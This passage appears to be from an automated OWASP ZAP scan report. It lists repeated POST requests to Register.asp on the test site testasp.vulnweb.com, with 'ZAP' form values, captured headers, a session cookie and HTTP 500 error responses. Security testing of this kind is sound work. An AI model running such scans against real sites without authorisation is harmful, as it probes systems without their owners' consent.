<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:08 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:09 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
